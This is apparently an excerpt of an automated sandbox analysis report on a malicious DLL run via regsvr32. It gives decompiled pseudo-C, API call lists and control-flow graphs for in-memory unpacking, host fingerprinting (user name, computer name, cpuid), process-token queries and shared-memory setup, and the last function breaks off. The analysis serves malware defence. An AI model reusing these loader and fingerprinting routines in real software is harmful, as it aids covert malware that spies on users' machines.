                                    • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,032F9858,00000020,?,?,00000010), ref: 001A40B8
                                    • GetLastError.KERNEL32(?,?,00000010), ref: 001A40E7
                                    • GetLastError.KERNEL32 ref: 001A4119
                                    • CryptDestroyKey.ADVAPI32(00000000), ref: 001A4125
                                    • GetLastError.KERNEL32 ref: 001A412D
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 001A413A
                                    • GetLastError.KERNEL32(?,?,?,001A48AF,00000001,001A72E3,00000000,?,001A63E1,00000000,001A72E3,?,00000000,001A72E3,00000000,032F9858), ref: 001A4142
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
                                    • String ID:
                                    • API String ID: 3401600162-0
                                    • Opcode ID: 1950cd468739f72187475dfb245e61fc0862e8da726a449428a0d1ae63117b1a
                                    • Instruction ID: 0e9a93257fffd42da741cbdd9c156f0247d5aa54570c41251a5a7ed953b686ca
                                    • Opcode Fuzzy Hash: 1950cd468739f72187475dfb245e61fc0862e8da726a449428a0d1ae63117b1a
                                    • Instruction Fuzzy Hash: 4F5178B6900208FFDF10DFA8DD88AEEBBB9EB45340F118429F901E6250D3749E94DB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2F85B0, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 102 6e2f85b0-6e2f85fc 104 6e2f85fe-6e2f8604 102->104 105 6e2f8606-6e2f860c 102->105 106 6e2f8625-6e2f864d 104->106 107 6e2f8611-6e2f8616 105->107 110 6e2f864f-6e2f8651 106->110 111 6e2f8691-6e2f8757 VirtualAlloc call 6e2f8307 call 6e2f82d7 VirtualAlloc call 6e2f825f VirtualFree 106->111 108 6e2f861f 107->108 109 6e2f8618-6e2f861d 107->109 108->106 109->107 110->111 112 6e2f8653-6e2f868d VirtualAlloc 110->112 119 6e2f8759-6e2f8773 call 6e2f8307 111->119 120 6e2f8774-6e2f8780 111->120 112->111 119->120 121 6e2f8787 120->121 122 6e2f8782-6e2f8785 120->122 124 6e2f878a-6e2f87a5 call 6e2f82d7 121->124 122->124 128 6e2f87bf-6e2f87ee 124->128 129 6e2f87a7-6e2f87ba call 6e2f81b6 124->129 131 6e2f8804-6e2f880f 128->131 132 6e2f87f0-6e2f87fe 128->132 129->128 134 6e2f882a-6e2f8847 VirtualProtect 131->134 135 6e2f8811-6e2f881a 131->135 132->131 133 6e2f8800 132->133 133->131 136 6e2f887c-6e2f8933 call 6e2f8439 call 6e2f83cb call 6e2f846f VirtualProtect 134->136 137 6e2f8849-6e2f8855 134->137 135->134 138 6e2f881c-6e2f8824 135->138 149 6e2f8939-6e2f895e 136->149 139 6e2f8857-6e2f886e VirtualProtect 137->139 138->134 141 6e2f8826 138->141 142 6e2f8872-6e2f887a 139->142 143 6e2f8870 139->143 141->134 142->136 142->139 143->142 150 6e2f8967 149->150 151 6e2f8960-6e2f8965 149->151 152 6e2f896c-6e2f8977 150->152 151->152 153 6e2f897c-6e2f8994 VirtualProtect 152->153 154 6e2f8979 152->154 153->149 155 6e2f8996-6e2f89bd VirtualFree GetPEB 153->155 154->153 156 6e2f89c2-6e2f89c9 155->156 157 6e2f89cf-6e2f89e9 156->157 158 6e2f89cb 156->158 160 6e2f89ec-6e2f8a15 call 6e2f84df call 6e2f8a1a 157->160 158->156 159 6e2f89cd 158->159 159->160
                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00000968,00003000,00000040,00000968,6E2F8000), ref: 6E2F866D
                                    • VirtualAlloc.KERNEL32(00000000,00000240,00003000,00000040,6E2F8062), ref: 6E2F86A4
                                    • VirtualAlloc.KERNEL32(00000000,000128C5,00003000,00000040), ref: 6E2F8704
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2F873A
                                    • VirtualProtect.KERNEL32(6E2A0000,00000000,00000004,6E2F858F), ref: 6E2F883F
                                    • VirtualProtect.KERNEL32(6E2A0000,00001000,00000004,6E2F858F), ref: 6E2F8866
                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E2F858F), ref: 6E2F8933
                                    • VirtualProtect.KERNEL32(00000000,?,00000002,6E2F858F,?), ref: 6E2F8989
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E2F89A5
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674637577.000000006E2F8000.00000040.00020000.sdmp, Offset: 6E2F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2f8000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Virtual$Protect$Alloc$Free
                                    • String ID:
                                    • API String ID: 2574235972-0
                                    • Opcode ID: 2b87e025b5db9985b170cb8b537f892202ecd194b2c70d8a7afb6ce543d29950
                                    • Instruction ID: 89f1a54d78cf5b643910a4cae35f406eadd612d3373ad43b279e6708b255b6d9
                                    • Opcode Fuzzy Hash: 2b87e025b5db9985b170cb8b537f892202ecd194b2c70d8a7afb6ce543d29950
                                    • Instruction Fuzzy Hash: 45D18836680605DFDB14CF45C980B91BFBAFF9A714B0909A4ED099F29AD771B801CBB0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2A1A1C, Relevance: 13.6, APIs: 9, Instructions: 107sleepnativesynchronizationCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    C-Code - Quality: 82%
                                    			E6E2A1A1C(intOrPtr _a4) {
				void _v316;
				signed int _v332;
				long _v344;
				long _v348;
				char _v356;
				char _v360;
				long _v364;
				long _v368;
				void* __edi;
				long _t25;
				long _t28;
				long _t31;
				long _t32;
				long _t36;
				void* _t42;
				intOrPtr _t44;
				intOrPtr _t49;
				long _t50;
				void* _t56;
				signed int _t59;
				signed int _t60;
				void* _t62;
				intOrPtr* _t63;

				_t25 = E6E2A1C6F();
				_v348 = _t25;
				if(_t25 != 0) {
					L18:
					return _t25;
				} else {
					goto L1;
				}
				do {
					L1:
					_v344 = 0;
					_t28 = NtQuerySystemInformation(8,  &_v316, 0x138,  &_v344); // executed
					_t50 = _t28;
					_t59 = 0x13;
					_t11 = _t50 + 1; // 0x1
					_t60 = _v332 % _t59 + _t11;
					_t31 = E6E2A18A0(0, _t60); // executed
					_v368 = _t31;
					Sleep(_t60 << 4);
					_t25 = _v368;
				} while (_t25 == 9);
				if(_t25 != 0) {
					goto L18;
				}
				_t32 = E6E2A1741(_t50); // executed
				_v364 = _t32;
				if(_t32 != 0) {
					L16:
					_t25 = _v364;
					if(_t25 == 0xffffffff) {
						_t25 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t62 = E6E2A1000(E6E2A1CDB,  &_v356);
					if(_t62 == 0) {
						_v368 = GetLastError();
					} else {
						_t36 = WaitForSingleObject(_t62, 0xffffffff);
						_v368 = _t36;
						if(_t36 == 0) {
							GetExitCodeThread(_t62,  &_v368);
						}
						CloseHandle(_t62);
					}
					goto L16;
				}
				if(E6E2A1468(_t50,  &_v360) != 0) {
					 *0x6e2a41b8 = 0;
					goto L11;
				}
				_t49 = _v360;
				_t63 = __imp__GetLongPathNameW;
				_t42 =  *_t63(_t49, 0, 0); // executed
				_t56 = _t42;
				if(_t56 == 0) {
					L9:
					 *0x6e2a41b8 = _t49;
					goto L11;
				}
				_t19 = _t56 + 2; // 0x2
				_t44 = E6E2A2102(_t56 + _t19);
				 *0x6e2a41b8 = _t44;
				if(_t44 == 0) {
					goto L9;
				} else {
					 *_t63(_t49, _t44, _t56); // executed
					E6E2A2117(_t49);
					goto L11;
				}
			}


























                                    0x6e2a1a2b
                                    0x6e2a1a34
                                    0x6e2a1a38
                                    0x6e2a1b4c
                                    0x6e2a1b52
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x6e2a1a3e
                                    0x6e2a1a3e
                                    0x6e2a1a4f
                                    0x6e2a1a53
                                    0x6e2a1a59
                                    0x6e2a1a61
                                    0x6e2a1a66
                                    0x6e2a1a66
                                    0x6e2a1a6b
                                    0x6e2a1a74
                                    0x6e2a1a78
                                    0x6e2a1a7e
                                    0x6e2a1a82
                                    0x6e2a1a89
                                    0x00000000
                                    0x00000000
                                    0x6e2a1a8f
                                    0x6e2a1a96
                                    0x6e2a1a9a
                                    0x6e2a1b3d
                                    0x6e2a1b3d
                                    0x6e2a1b44
                                    0x6e2a1b46
                                    0x6e2a1b46
                                    0x00000000
                                    0x6e2a1b44
                                    0x6e2a1aa3
                                    0x6e2a1af6
                                    0x6e2a1af6
                                    0x6e2a1b07
                                    0x6e2a1b0b
                                    0x6e2a1b39
                                    0x6e2a1b0d
                                    0x6e2a1b10
                                    0x6e2a1b18
                                    0x6e2a1b1c
                                    0x6e2a1b24
                                    0x6e2a1b24
                                    0x6e2a1b2b
                                    0x6e2a1b2b
                                    0x00000000
                                    0x6e2a1b0b
                                    0x6e2a1ab1
                                    0x6e2a1af0
                                    0x00000000
                                    0x6e2a1af0
                                    0x6e2a1ab3
                                    0x6e2a1ab7
                                    0x6e2a1ac0
                                    0x6e2a1ac2
                                    0x6e2a1ac6
                                    0x6e2a1ae8
                                    0x6e2a1ae8
                                    0x00000000
                                    0x6e2a1ae8
                                    0x6e2a1ac8
                                    0x6e2a1acd
                                    0x6e2a1ad4
                                    0x6e2a1ad9
                                    0x00000000
                                    0x6e2a1adb
                                    0x6e2a1ade
                                    0x6e2a1ae1
                                    0x00000000
                                    0x6e2a1ae1

                                    APIs
                                      • Part of subcall function 6E2A1C6F: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6E2A1A30,74EC325B,00000000), ref: 6E2A1C7E
                                      • Part of subcall function 6E2A1C6F: GetVersion.KERNEL32 ref: 6E2A1C8D
                                      • Part of subcall function 6E2A1C6F: GetCurrentProcessId.KERNEL32 ref: 6E2A1C9C
                                      • Part of subcall function 6E2A1C6F: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6E2A1CB5
                                    • NtQuerySystemInformation.NTDLL(00000008,?,00000138,?), ref: 6E2A1A53
                                      • Part of subcall function 6E2A18A0: VirtualAlloc.KERNEL32(00000000,6E2A1A70,00003000,00000004,?,?,6E2A1A70,00000001), ref: 6E2A18F6
                                      • Part of subcall function 6E2A18A0: memcpy.NTDLL(?,?,6E2A1A70,?,?,6E2A1A70,00000001), ref: 6E2A1991
                                      • Part of subcall function 6E2A18A0: VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6E2A1A70,00000001), ref: 6E2A19AC
                                    • Sleep.KERNEL32(00000001,00000001), ref: 6E2A1A78
                                    • GetLongPathNameW.KERNEL32 ref: 6E2A1AC0
                                    • GetLongPathNameW.KERNEL32 ref: 6E2A1ADE
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,6E2A1CDB,?,00000000), ref: 6E2A1B10
                                    • GetExitCodeThread.KERNEL32(00000000,?), ref: 6E2A1B24
                                    • CloseHandle.KERNEL32(00000000), ref: 6E2A1B2B
                                    • GetLastError.KERNEL32(6E2A1CDB,?,00000000), ref: 6E2A1B33
                                    • GetLastError.KERNEL32 ref: 6E2A1B46
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ErrorLastLongNamePathProcessVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleInformationObjectOpenQuerySingleSleepSystemThreadVersionWaitmemcpy
                                    • String ID:
                                    • API String ID: 2016936029-0
                                    • Opcode ID: c95146e7707b46ef3d0a0bf7eba592fc92812841cffb27d64f2dcfe353f0283c
                                    • Instruction ID: cf232d89192480cb684de5ce46774c45d6ebf36d08a8e01e17090a18a6c650c7
                                    • Opcode Fuzzy Hash: c95146e7707b46ef3d0a0bf7eba592fc92812841cffb27d64f2dcfe353f0283c
                                    • Instruction Fuzzy Hash: 223180B550471AAB8740DFAD884899FB6EFBB85761F00091AFA55C2140EB70C589CBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2A109B, Relevance: 13.6, APIs: 9, Instructions: 81filetimeCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    C-Code - Quality: 69%
                                    			E6E2A109B(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6E2A2220();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6e2a41d0;
				_push(_t15 + 0x6e2a505e);
				_push(_t15 + 0x6e2a5054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6E2A221A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x6e2a41c0, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}














                                    0x6e2a109b
                                    0x6e2a10a4
                                    0x6e2a10a8
                                    0x6e2a10ae
                                    0x6e2a10b3
                                    0x6e2a10b8
                                    0x6e2a10bb
                                    0x6e2a10be
                                    0x6e2a10c3
                                    0x6e2a10c4
                                    0x6e2a10c7
                                    0x6e2a10d2
                                    0x6e2a10d9
                                    0x6e2a10dd
                                    0x6e2a10df
                                    0x6e2a10e0
                                    0x6e2a10e3
                                    0x6e2a10e8
                                    0x6e2a10f2
                                    0x6e2a10f4
                                    0x6e2a10f4
                                    0x6e2a1108
                                    0x6e2a110e
                                    0x6e2a1112
                                    0x6e2a1162
                                    0x6e2a1114
                                    0x6e2a111d
                                    0x6e2a1133
                                    0x6e2a113b
                                    0x6e2a114d
                                    0x6e2a1151
                                    0x00000000
                                    0x00000000
                                    0x6e2a113d
                                    0x6e2a1140
                                    0x6e2a1145
                                    0x6e2a1147
                                    0x6e2a1147
                                    0x6e2a1128
                                    0x6e2a112a
                                    0x6e2a1153
                                    0x6e2a1154
                                    0x6e2a1154
                                    0x6e2a111d
                                    0x6e2a116a

                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 6E2A10A8
                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E2A10BE
                                    • _snwprintf.NTDLL ref: 6E2A10E3
                                    • CreateFileMappingW.KERNELBASE(000000FF,6E2A41C0,00000004,00000000,?,?), ref: 6E2A1108
                                    • GetLastError.KERNEL32 ref: 6E2A111F
                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6E2A1133
                                    • GetLastError.KERNEL32 ref: 6E2A114B
                                    • CloseHandle.KERNEL32(00000000), ref: 6E2A1154
                                    • GetLastError.KERNEL32 ref: 6E2A115C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                    • String ID:
                                    • API String ID: 1724014008-0
                                    • Opcode ID: fb34ae1a125457e04276a1739b98be1498d6b759aedd265ae5c72e5a526184ef
                                    • Instruction ID: 982acb0dd414295e4523f6d93fd091775a86fb3021a750fe0d08ec8dfbe0d254
                                    • Opcode Fuzzy Hash: fb34ae1a125457e04276a1739b98be1498d6b759aedd265ae5c72e5a526184ef
                                    • Instruction Fuzzy Hash: 96218CF2640209BFDB00AFDCCC88E9E77AAEB49365F144025F615E7140D6B19989CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A2E33, Relevance: 12.1, APIs: 8, Instructions: 102memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 281 1a2e33-1a2e47 282 1a2e49-1a2e4e 281->282 283 1a2e51-1a2e63 call 1a3569 281->283 282->283 286 1a2eb7-1a2ec4 283->286 287 1a2e65-1a2e75 GetUserNameW 283->287 288 1a2ec6-1a2edd GetComputerNameW 286->288 287->288 289 1a2e77-1a2e87 RtlAllocateHeap 287->289 290 1a2f1b-1a2f3d 288->290 291 1a2edf-1a2ef0 RtlAllocateHeap 288->291 289->288 292 1a2e89-1a2e96 GetUserNameW 289->292 291->290 293 1a2ef2-1a2efb GetComputerNameW 291->293 294 1a2e98-1a2ea4 call 1a1d41 292->294 295 1a2ea6-1a2eb5 HeapFree 292->295 296 1a2f0c-1a2f15 HeapFree 293->296 297 1a2efd-1a2f09 call 1a1d41 293->297 294->295 295->288 296->290 297->296
                                    C-Code - Quality: 96%
                                    			E001A2E33(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				int _t43;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x1aa2c8; // 0xeb872a02
					_v12 = _t59;
				}
				_t64 = _t69;
				E001A3569( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x1aa2d0 ^ 0x46d76429;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x1aa290, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E001A1D41(_v8 + _v8, _t63);
							}
							HeapFree( *0x1aa290, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8); // executed
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x1aa290, 0, _t34 + _t34);
					if(_t68 != 0) {
						_t43 = GetComputerNameW(_t68,  &_v8); // executed
						if(_t43 != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E001A1D41(_v8 + _v8, _t63);
						}
						HeapFree( *0x1aa290, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}





















                                    0x001a2e33
                                    0x001a2e3b
                                    0x001a2e41
                                    0x001a2e44
                                    0x001a2e47
                                    0x001a2e49
                                    0x001a2e4e
                                    0x001a2e4e
                                    0x001a2e54
                                    0x001a2e56
                                    0x001a2e63
                                    0x001a2ec4
                                    0x001a2e65
                                    0x001a2e6a
                                    0x001a2e70
                                    0x001a2e75
                                    0x001a2e83
                                    0x001a2e87
                                    0x001a2e96
                                    0x001a2e9d
                                    0x001a2ea4
                                    0x001a2ea4
                                    0x001a2eaf
                                    0x001a2eaf
                                    0x001a2e87
                                    0x001a2e75
                                    0x001a2ec6
                                    0x001a2ecc
                                    0x001a2ed6
                                    0x001a2ed8
                                    0x001a2edd
                                    0x001a2eec
                                    0x001a2ef0
                                    0x001a2ef7
                                    0x001a2efb
                                    0x001a2f02
                                    0x001a2f09
                                    0x001a2f09
                                    0x001a2f15
                                    0x001a2f15
                                    0x001a2ef0
                                    0x001a2f1e
                                    0x001a2f20
                                    0x001a2f23
                                    0x001a2f25
                                    0x001a2f28
                                    0x001a2f2b
                                    0x001a2f35
                                    0x001a2f39
                                    0x001a2f3d

                                    APIs
                                    • GetUserNameW.ADVAPI32(00000000,001A5FA9), ref: 001A2E6A
                                    • RtlAllocateHeap.NTDLL(00000000,001A5FA9), ref: 001A2E81
                                    • GetUserNameW.ADVAPI32(00000000,001A5FA9), ref: 001A2E8E
                                    • HeapFree.KERNEL32(00000000,00000000), ref: 001A2EAF
                                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 001A2ED6
                                    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001A2EEA
                                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 001A2EF7
                                    • HeapFree.KERNEL32(00000000,00000000), ref: 001A2F15
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: HeapName$AllocateComputerFreeUser
                                    • String ID:
                                    • API String ID: 3239747167-0
                                    • Opcode ID: 5b93a843b436b25345005987747340791bd1fc4df951f652b0fcca7111a52151
                                    • Instruction ID: bc6e0b669991312e48ec06d1ed373bce52e10c6f20f454c774712d9cbae132d0
                                    • Opcode Fuzzy Hash: 5b93a843b436b25345005987747340791bd1fc4df951f652b0fcca7111a52151
                                    • Instruction Fuzzy Hash: 4F310676A00209EFDB11DFA9DD81AAEB7F9FF4A350F604429E505D7620E730AE809B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 001A22EC, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    C-Code - Quality: 38%
                                    			E001A22EC(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E001A77D7(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E001A77EC(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                    0x001a22f9
                                    0x001a22fa
                                    0x001a22fb
                                    0x001a22fc
                                    0x001a22fd
                                    0x001a2301
                                    0x001a2308
                                    0x001a2317
                                    0x001a231a
                                    0x001a231d
                                    0x001a2324
                                    0x001a2327
                                    0x001a232a
                                    0x001a232d
                                    0x001a2330
                                    0x001a233b
                                    0x001a233d
                                    0x001a2346
                                    0x001a234e
                                    0x001a2350
                                    0x001a2362
                                    0x001a236c
                                    0x001a2370
                                    0x001a237f
                                    0x001a2383
                                    0x001a238c
                                    0x001a2394
                                    0x001a2394
                                    0x001a2396
                                    0x001a2396
                                    0x001a239e
                                    0x001a23a4
                                    0x001a23a8
                                    0x001a23a8
                                    0x001a23b3

                                    APIs
                                    • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 001A2333
                                    • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 001A2346
                                    • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 001A2362
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                    • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 001A237F
                                    • memcpy.NTDLL(00000000,00000000,0000001C), ref: 001A238C
                                    • NtClose.NTDLL(00000000), ref: 001A239E
                                    • NtClose.NTDLL(00000000), ref: 001A23A8
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp Download File
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                    • String ID:
                                    • API String ID: 2575439697-0
                                    • Opcode ID: 1cbc3f3152d74a83c0c6d93e6105b0e89b1e88da4503842f227c768af75aa889
                                    • Instruction ID: 1ee0783d4355a249149c9c088fc00a4d46e47975d0178081e2fe40b9879cef30
                                    • Opcode Fuzzy Hash: 1cbc3f3152d74a83c0c6d93e6105b0e89b1e88da4503842f227c768af75aa889
                                    • Instruction Fuzzy Hash: 5821E9B6A00219BBDF01AF95CC459DEBFBDFF0A750F104066F504E6160D7719A859BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 6E2A2013, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70nativeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 72%
                                    			E6E2A2013(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E6E2A121F(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}


















                                    0x6e2a201c
                                    0x6e2a2023
                                    0x6e2a2024
                                    0x6e2a2025
                                    0x6e2a2026
                                    0x6e2a2027
                                    0x6e2a2038
                                    0x6e2a203c
                                    0x6e2a2050
                                    0x6e2a2053
                                    0x6e2a2056
                                    0x6e2a205d
                                    0x6e2a2060
                                    0x6e2a2067
                                    0x6e2a206a
                                    0x6e2a206d
                                    0x6e2a2070
                                    0x6e2a2075
                                    0x6e2a20b0
                                    0x6e2a2077
                                    0x6e2a207a
                                    0x6e2a2080
